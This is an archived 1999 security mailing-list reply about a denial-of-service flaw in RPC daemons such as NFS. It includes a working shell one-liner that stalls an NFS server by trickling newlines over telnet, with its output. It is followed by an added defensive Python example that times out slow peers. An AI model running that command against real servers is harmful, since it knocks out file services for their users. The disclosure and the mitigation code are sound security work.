On Wed, Apr 14, 1999 at 03:26:14PM +0200, Lukasz Luzar wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>      ###   ###  ###   ###  ###
>      ###  ###   ###  ###   ###
>      ######     ######     ###
>      ###  ###   ###  ###   ###
>      ###   ###  ###   ###  ###
>
>                S E C U R I T Y
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> KKI Security Team                   Cracow Commercial Internet, Poland
> http://www.security.kki.pl          http://www.kki.pl
> mailto:securityat_private           mailto:biuroat_private
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Report title : Lack of RPC's implementation in libc libraries
>                and how it affects, for example, portmap.

A much easier DoS is obtained by connecting to an RPC port and just sending
some random (most will do) garbage every 5 seconds. Note that this _does_
affect the UDP services in the same daemons.

I have seen this bug in _every_ RPC implementation, with a few exceptions:
mcserv (which does not really use the RPC protocol, only the portmapper),
Sun's own nfsd [although their portmapper is buggy], and NetApp boxes.

To wit:

[root@koek] ~# ( while true ; do echo ; sleep 5 ; done ) | telnet zopie 2049
Trying 10.10.13.1...
Connected to zopie.attic.vuurwerk.nl.
Escape character is '^]'.
NFS server zopie not responding, still trying.

Connection closed by foreign host.
[root@koek] ~# NFS server zopie OK.

Right after I started the telnet, I switched to another VC and did
ls /zopie, the NFS mounted disk. The ls did not give any output until I
Ctrl-C'ed the telnet.

Greetz,

Peter

--
| 'He broke my heart,   | Peter van Dijk                              |
| I broke his neck'     | peterat_private                             |
| nognixz - As the sun  | Hardbeat@ircnet - #cistron/#linux.nl        |
|                       | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
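The stall described above comes from a single-threaded server blocking in read() until a complete RPC record has arrived, so one peer dripping bytes holds up every other client. What follows is an added example (not code from this post or from any RPC library) of the mitigation a defender would want: record-marking reassembly that never blocks on a partial fragment and reports a peer that fails to finish a record within a deadline, so the accept loop can drop that peer and keep serving the rest. The record-marking layout is the one from RFC 5531; the deadline and fragment-size limits are assumed policy values chosen for illustration.

```python
import struct
MAX_RECORD_SECONDS = 10.0        # assumed policy: drop a peer that cannot finish a record in time
MAX_FRAGMENT_BYTES = 64 * 1024   # assumed policy: reject fragment lengths no sane client sends

class RpcRecordReader:
    """Reassemble RPC record-marking fragments (RFC 5531 s.11: 4-byte header, high
    bit = last fragment, low 31 bits = length) without ever blocking on a partial one."""
    def __init__(self, now):
        self.buf = b""            # bytes received but not yet consumed
        self.record = b""         # fragments of the record currently being assembled
        self.started = now        # when the current record began (for the deadline)
        self.records = []         # completed records, ready for the dispatcher

    def feed(self, data, now):
        """Consume bytes received at time `now` (b"" acts as a timer tick).
        Returns 'ok', 'record' (a record completed), 'bad-fragment' or 'timeout'."""
        self.buf += data
        completed = False
        while len(self.buf) >= 4:
            (hdr,) = struct.unpack("!I", self.buf[:4])
            last, length = bool(hdr & 0x80000000), hdr & 0x7FFFFFFF
            if length > MAX_FRAGMENT_BYTES:
                return "bad-fragment"          # random garbage almost always ends here
            if len(self.buf) < 4 + length:
                break                          # fragment incomplete: return, do not block
            self.record += self.buf[4:4 + length]
            self.buf = self.buf[4 + length:]
            if last:
                self.records.append(self.record)
                self.record, self.started, completed = b"", now, True
        if completed:
            return "record"
        if now - self.started > MAX_RECORD_SECONDS:
            return "timeout"                   # peer is dripping bytes: drop it, serve others
        return "ok"

def simulate(chunks):
    """Feed (time, bytes) pairs; return the first non-'ok' verdict, its time, and records so far."""
    reader = RpcRecordReader(now=chunks[0][0])
    for t, data in chunks:
        verdict = reader.feed(data, t)
        if verdict != "ok":
            return verdict, t, reader.records
    return "ok", chunks[-1][0], reader.records

# Constructed inputs: a legitimate two-fragment record, the newline-every-5-seconds
# drip from the post, and a peer that sends a valid header and then goes silent.
TWO_FRAGMENTS = [(0.0, struct.pack("!I", 3) + b"abc"), (1.0, struct.pack("!I", 0x80000003) + b"def")]
NEWLINE_DRIP = [(5.0 * i, b"\n") for i in range(6)]
SILENT_AFTER_HEADER = [(0.0, struct.pack("!I", 0x80000064)), (12.0, b"")]
```

In a real daemon the same reader sits behind a select()/poll() loop, with feed(b"", now) called on each timer tick so silent peers are expired even when no bytes arrive.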
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:42:45 PDT